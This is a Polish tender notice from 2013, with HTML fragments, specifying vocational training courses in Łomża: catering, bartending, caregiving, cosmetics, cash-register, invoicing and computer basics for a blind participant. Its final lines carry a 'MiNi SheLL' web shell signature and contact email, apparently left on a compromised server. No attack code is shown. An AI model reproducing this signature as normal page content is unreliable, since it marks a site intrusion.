ORGANIZACJA SZKOLENIA: zajęcia skumulowane, wg harmonogramu ustalonego z uczestnikami, niekolidujące z programem kursu- kelner barman oraz kursu gastronomicznego- moduł II

Wymagana ilość godzin zajęć dydaktycznych dla każdego uczestnika szkolenia: 15  godzin dydaktycznych
Program szkolenia powinien uwzględniać:
budowy kas fiskalnych
pracy przy kasie fiskalnej - rejestracji sprzedaży i programowania kas fiskalnych
obsługi urządzeń dodatkowych wspomagających pracę kasjera, w tym terminali kart płatniczych
obsługi kas fiskalnych w połączeniu z komputerowym systemem obsługi sprzedaży


2.	Kurs gastronomiczny- moduł I- Profesjonalny catering i dekoracja stołu

LICZBA UCZESTNIKÓW: 5
TERMIN  REALIZACJI USŁUGI : od 7 do 20 VIII 2013
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża 
ORGANIZACJA SZKOLENIA: istotnym warunkiem zamówienia jest przeprowadzenie zajęć w systemie dziennym, od poniedziałku do piątku, od 800do 1530   (9 godzin szkoleniowych dziennie) 

WYMAGANIA DODATKOWE: 

czas trwania  szkolenia 70 godzin dydaktycznych przypadających na każdego uczestnika szkolenia, w tym nie mniej niż 60  godzin zajęć praktycznych 
kurs ma się odbywać w lokalu dostosowanym do prawidłowego przeprowadzenia zajęć praktycznych dla 5 osób, gdzie dostępny jest sprzęt kuchenny niezbędny do zrealizowania programu kursu, każdemu uczestnikowi należy zapewnić samodzielne stanowisko pracy.
program szkolenia powinien uwzględniać zagadnienia z zakresu:

 zajęcia teoretyczne: działalność cateringowa, zagadnienia higieny w procesie produkcji żywności i obrocie żywnością, 
a)	planowanie posiłków i układnie menu na tzw szwedzki stół 
b)	sporządzanie różnymi technikami i metodami podstawowego asortymentu potraw i napojów serwowanych najczęściej na tzw szwedzkim stole , w tym: 
przystawki, np. babeczki koktajlowe, kaneczki dekoracyjne, roladki, tartinki, ryby i mięsa w galarecie itp. 
lunch w podgrzewaczach np. zupy-krem z kuleczkami mięsnymi, roladki ze schabu, 
sałaty i surówki 
słodkie desery 
c)	porcjowanie potraw
d)	dekorowanie potraw
e)	dekorowanie stołu

3.	Kurs gastronomiczny- moduł II- 
LICZBA UCZESTNIKÓW: 2
TERMIN  REALIZACJI USŁUGI : od 21 do 31 VIII 2013
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża 
ORGANIZACJA SZKOLENIA: istotnym warunkiem zamówienia jest przeprowadzenie zajęć w systemie dziennym, od poniedziałku do piątku,  od 800do 1530   (9 godzin szkoleniowych dziennie), ewentualnie w soboty od 800 do 1500
Z uwagi na fakt, że wszyscy uczestnicy uczestniczą też w szkoleniu z zakresu  Obsługa kasy fiskalnej+ terminali kart płatniczych oraz Kurs gastronomiczny- moduł I fakt ten należy uwzględnić w przygotowywaniu harmonogramu kursu


WYMAGANIA DODATKOWE: 
czas trwania  szkolenia 70 godzin dydaktycznych przypadających na każdego uczestnika szkolenia, w tym nie mniej niż 60  godzin zajęć praktycznych 
kurs ma się odbywać w lokalu dostosowanym do prawidłowego przeprowadzenia zajęć praktycznych dla 2 osób, gdzie dostępny jest sprzęt kuchenny niezbędny do zrealizowania programu kursu, każdemu uczestnikowi należy zapewnić samodzielne stanowisko pracy.

WYMAGANIA DODATKOWE: 

Program kursu powinien zawierać:
sporządzanie potraw z jaj i przetworów mleczarskich  chłodniki, desery, napoje, jaja faszerowane
sporządzanie zup, dodatki do zup czystych i zagęszczonych, sosy
sporządzanie potraw mącznych pierogi, kluski śląskie, kopytka, kołduny, uszka
sporządzanie potraw mięsnych i z drobiu  gotowanych, smażonych, grillowanych
sporządzanie potraw z ryb

dotyczy kursu gastronomicznego- moduł I i II:
Do materiałów dydaktycznych należy dołączyć przepisy na potrawy wykonywane podczas kursu. 

4.	Kelner - barman
LICZBA UCZESTNIKÓW: 5
TERMIN  REALIZACJI USŁUGI : sierpień 2013
MIEJSCE REALIZACJI USŁUGI:  preferowane miasto Łomża, w przypadku szkoleń odbywających się poza Łomżą do ceny kursu należy doliczyć koszty zakwaterowania i wyżywienia 
CEL SZKOLENIA: celem szkolenia jest nabycie wiedzy teoretycznej i praktycznych umiejętności oraz przygotowanie do pracy na stanowisku barman - barista i kelner
ORGANIZACJA SZKOLENIA: istotnym warunkiem zamówienia jest przeprowadzenie zajęć w systemie dziennym, od poniedziałku do piątku, od 800do 1530  9 godzin szkoleniowych dziennie
Z uwagi na fakt, że wszyscy uczestnicy uczestniczą też w szkoleniu z zakresu  Obsługa kasy fiskalnej i terminali kart płatniczych fakt ten należy uwzględnić w przygotowywaniu harmonogramu kursu


WYMAGANIA DODATKOWE: 

W czas trwania  szkolenia 120  godzin dydaktycznych przypadających na każdego uczestnika szkolenia, w tym nie mniej niż 100 godzin zajęć praktycznych 
Szkolenie powinno zawierać co najmniej zagadnienia:
z zakresu zawodu barmana:
wprowadzenie do zawodu barmana - wizerunek, obowiązki, etyka, organizacja pracy, bhp,
sprzęt barowy - rodzaje, nazwy, funkcjonowanie,
alkoholoznawstwo - kategorie/podział alkoholi, produkcja, zastosowanie,
zasady i technika komponowania napojów mieszanych - charakterystyka, podział, składniki,
zasady podawania napojów alkoholowych - serwowanie alkoholi, obsługa przy barze i stoliku,
wprowadzenie do zawodu barista
obowiązki, narzędzia, organizacja pracy, bhp,
podstawowe informacje o kawie - historia, gatunki, uprawa, pozyskiwanie, obróbka ziaren, magazynowanie, sposoby palenia,
espresso - sprzęt, etapy przygotowania, prawidłowe metody dozowania i ubijania,
napoje na bazie espresso,
zdobienie - wzory lane, rysowane.
z zakresu zawodu kelnera:
przestrzeganie zasad bhp, ppoż. w sali konsumenckiej
wykazywanie kultury osobistej i przestrzeganie etyki zawodowej
wyposażenie i obsługa sprzętu kelnerskiego w części konsumenckiej i ekspedycyjnej
przygotowanie poprzedzające obsługę
przygotowanie sali konsumenckiej
obsługiwanie w sali konsumenckiej
noszenie zastawy
serwowanie potraw
wydawanie śniadań
przygotowanie potraw w obecności konsumenta
serwowanie napojów bezalkoholowych zimnych i gorących
serwowanie napojów alkoholowych
organizacja przyjęć okolicznościowych
obsługa gości hotelowych przez kelnera
wystawianie rachunków

Wykonawca zapewni  niezbędny sprzęt i lokal do zrealizowania programu kursu. 
Do materiałów dydaktycznych należy dołączyć przepisy na napoje wykonywane  podczas kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs opiekuna osób zależnych (opiekun osób starszych,chorych,niepełnosprawnych, opiekunka dziecięca, opiekun środowiskowy).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs  opiekun osób zależnych (opiekun osób starszych
,chorych, niepełnosprawnych, opiekunka dziecięca, opiekun środowiskowy)


LICZBA UCZESTNIKÓW: 10
TERMIN  REALIZACJI USŁUGI : od 7 VIII do 22 VIII 2013 oraz od 2 do10 IX 2013
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża 
CEL SZKOLENIA:  przygotowanie uczestników do udzielania pomocy i świadczenia usług opiekuńczych w odniesieniu do osób przewlekle chorych, samotnych i niesamodzielnych oraz opieki nad dzieckiem
ORGANIZACJA SZKOLENIA: szkolenie winno odbywać się  w dni powszednie od poniedziałku do piątku  w godz. od 9:00 do16:00  (8 godzin szkoleniowych dziennie)
Z uwagi na okres wakacyjny zajęcia praktyczne w przedszkolu powinny odbyć się w miesiącu wrześniu. 

WYMAGANIA DODATKOWE: 
Program szkolenia powinien obejmować 120 godzin dydaktycznych  (zajęć teoretycznych 
i praktycznych); w tym co najmniej 80 godzin zajęć praktycznych.
 (praktyka powinna odbywać się w 2 miejscach: przedszkolu ( co najmniej 40 godzin) oraz instytucji opiekującej się osobami starszymi (co najmniej 40 godzin). W godzinach szkoleniowych  należy ująć ocenę końcową uczestnika szkolenia (np. w formie egzaminu, testu, itp.)

1	szkolenie powinno obejmować zagadnienia z zakresu:
przepisów prawa dotyczących działań pomocowych i realizacji opieki nad podopiecznymi
organizowania i planowania pracy zgodnie z przepisami i zasadami bezpieczeństwa i higieny pracy
roli i zadań opiekuna, etyki opiekuna, form opieki i pomocy ludziom starszym, chorym, niepełnosprawnym, małoletnim (dzieciom)
zasad udzielania pierwszej pomocy w przypadkach zagrożenia zdrowia i życia podopiecznego
moduł: opieka nad osobami starszymi/chorymi/niepełnosprawnymi
pielęgnowania podstawowego i opieki nad ludźmi przewlekle chorymi i niepełnosprawnymi
pomagania podopiecznemu w codziennych czynnościach domowych
aktywizowania podopiecznego do zwiększania jego samodzielności życiowej mobilizowania podopiecznego do aktywnego spędzania czasu wolnego i rozwijania jego zainteresowań
pomocy przy usprawnianiu ruchowym chorego i niepełnosprawnego (elementy rehabilitacji 
i gimnastyki)
podejmowania współpracy ze środowiskiem podopiecznego, zespołami opiekuńczymi 
i terapeutycznymi
doradzanie w zakresie planowania i organizacji gospodarstwa domowego, 
kontaktowanie się z różnego rodzaju instytucjami w celu rozwiązywania problemów zdrowotnych, materialnych, mieszkaniowych, rodzinnych i prawnych podopiecznego, 
inicjowanie pozytywnych relacji międzyludzkich w najbliższym otoczeniu podopiecznego, 
a zwłaszcza z członkami jego rodziny
moduł: pielęgnacja i wychowanie dziecka
potrzeby biologiczne małego dziecka
choroby wieku dziecięcego w pigułce, opieka nad chorym dzieckiem
pierwsza pomoc dzieciom w nagłych wypadkach
żywienie niemowląt i małych dzieci
wypoczynek a rozwój małego dziecka - spacer, hartowanie, sen
kąpiel i pielęgnacja skóry dziecka 
stosowanie podstawowych zasad i metod wychowania
stosowanie wybranych zabaw i gier wpływających na rozwój dziecka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs  kosmetyczny zawierający III moduły Stylizacja paznokci, Wizaż wraz ze stylizacją rzęs ,Depilacja woskiem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs  kosmetyczny zawierający III moduły

LICZBA UCZESTNIKÓW: 4
TERMIN  REALIZACJI USŁUGI : od 7 VIII do 23 VIII 2013
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża 
CEL SZKOLENIA:  nabycie praktycznych umiejętności zakresie stylizacji paznokci, wizażu oraz depilacji
ORGANIZACJA SZKOLENIA: szkolenie winno odbywać się  w dni powszednie, od poniedziałku do piątku,  w godz. od 8:00 do15:30  (9 godzin dydaktycznych dziennie)

Liczba godzin: kurs powinien zawierać przynajmniej 120 godzin dydaktycznych, w tym przynajmniej 100 godzin zajęć praktycznych i składać się z następujących bloków tematycznych:
I moduł : Stylizacja paznokci (przynajmniej 60 godzin zajęć ).
pielęgnacja dłoni, stóp i paznokci 
manicure i pedicure klasyczny
manicure i pedicure hybrydowy
reperacja paznokci
wzornictwo paznokci podstawowe
II moduł: Wizaż wraz ze stylizacją rzęs ( przynajmniej 40 godzin zajęć)
stanowisko pracy, przybory i kuferek wizażysty
charakterystyka kosmetyków do wizażu
zasady higieny miejsca pracy wizażysty
pielęgnacja, masaż relaksacyjny, oczyszczanie twarzy, zmywanie i techniki usuwania makijażu
analiza kolorystyczna, oddziaływanie barw, podział na cieple i zimne typy urody 
charakterystyka i kształty twarzy, modelowanie twarzy różnymi technikami
makijaż korekcyjny i techniki kamuflażu
korekta brwi 
korekta oczu, rodzaj i kształt - kreska, cieniowanie, eye liner, techniki malowania rzęs 
korekta ust 
korekta niedoskonałości twarzy - przebarwienia, pękające naczynka, cienie pod oczami, zmarszczki 
wykonywanie różnego rodzaju makijażu (makijaż dzienny, wieczorowy, makijaż do okularów)
Moduł III: Depilacja woskiem
Higiena i bezpieczeństwo pracy,  stanowisko pracy (przygotowanie stanowiska, omówienie poszczególnych akcesoriów, preparatów, wosków )
Metody depilacji (mechaniczne, chemiczne, definitywne usuwanie zbędnego owłosienia) 
Depilacja poszczególnych części ciała.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Obsługa kasy fiskalnej i terminali kart płatniczych oraz	Sprzedawca i fakturowanie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obsługa kasy fiskalnej i  terminali kart płatniczych

LICZBA UCZESTNIKÓW: 22    przynajmniej  2 grupy szkoleniowe
TERMIN  REALIZACJI USŁUGI : I grupa ( 8,9,12 VIII 2013)- 12 osób ,  II grupa (3,4,5,6  IX 2013)- 10 osób
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża 
CEL SZKOLENIA: nabycie praktycznych umiejętności posługiwania się kasą fiskalną i terminalami kart płatniczych
ORGANIZACJA SZKOLENIA: zajęcia dla I grupy w godz od 9.00, dla II grupy od 14.00

Wymagana ilość godzin zajęć dydaktycznych dla każdego uczestnika szkolenia: 15  godzin dydaktycznych
Program szkolenia powinien uwzględniać:
budowy kas fiskalnych
pracy przy kasie fiskalnej - rejestracji sprzedaży i programowania kas fiskalnych
obsługi urządzeń dodatkowych wspomagających pracę kasjera, w tym terminali kart płatniczych
obsługi kas fiskalnych w połączeniu z komputerowym systemem obsługi sprzedaży
W trakcie zajęć praktycznych Wykonawca zapewnia samodzielne stanowisko kasy fiskalnej dla każdego uczestnika szkolenia


 Sprzedawca z fakturowaniem

LICZBA UCZESTNIKÓW: 8
TERMIN  REALIZACJI USŁUGI : od 19 do 29 VIII 2013
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża 
CEL SZKOLENIA: przygotowanie uczestników szkolenia do pracy w zawodzie sprzedawcy
ORGANIZACJA SZKOLENIA: istotnym warunkiem zamówienia jest przeprowadzenie zajęć w dni robocze,  w godz od 9.00-15.00

WYMAGANIA DODATKOWE: 

Wymagana ilość godzin zajęć dydaktycznych dla każdego uczestnika szkolenia: 60 godzin dydaktycznych 

kurs sprzedawca i fakturowanie

minimum sanitarnego
technik sprzedaży
obsługi klienta z wykorzystaniem aktywnych metod sprzedaży
pozyskiwania i obsługi nabywców
przyjmowania dostaw towarów oraz ich przygotowanie do sprzedaży
dokumentowania obrotu towaru, operacji rachunkowo - kasowych
marketingu i reklamy
fakturowanie i dokumentowanie sprzedaży
obsługa programów komputerowych służących do fakturowania ( co najmniej 20 godzin)

W trakcie zajęć praktycznych Wykonawca zapewnia samodzielne stanowisko komputerowe z oprogramowaniem dla każdego uczestnika szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Podstawy obsługi komputera i Internetu dla osoby niewidomej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podstawy obsługi komputera i Internetu dla osoby niewidomej


LICZBA UCZESTNIKÓW: 1
TERMIN  REALIZACJI USŁUGI: 7,8,9,12,13 VIII 2013
MIEJSCE REALIZACJI USŁUGI: w miejscowości Miastkowo ze względu na miejsce zamieszkania osoby uczestniczącej w szkoleniu
CEL SZKOLENIA: nabycie podstawowych umiejętności z zakresu obsługi komputera przez  osobę niewidomą
ORGANIZACJA SZKOLENIA: istotnym warunkiem zamówienia jest przeprowadzenie zajęć w sposób skumulowany przez 5 dni, po 6 godzin szkoleniowych dziennie

Wymagana liczba godzin -30 godz. dydaktycznych 
Wykonawca musi zapewnić sprzęt komputerowy przystosowany dla osób niewidomych z odpowiednim oprogramowaniem np. JAWS dostosowanym dla w/w osób oraz specjalistyczną klawiaturą i głośnikami
W cenie kursu należy uwzględnić koszty wynajęcia lokalu
Program kursu powinien zawierać elementy tj.:

1.	Komputer i jego elementy
2.	Podstawy udźwiękowienia komputera
3.	Działanie systemu operacyjnego Windows w oparciu o programy udźwiękawiające
4.	Zastosowania specjalistycznego sprzętu i oprogramowania udźwiękawiającego
5.	Internet wraz z oprogramowaniem specjalistycznym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com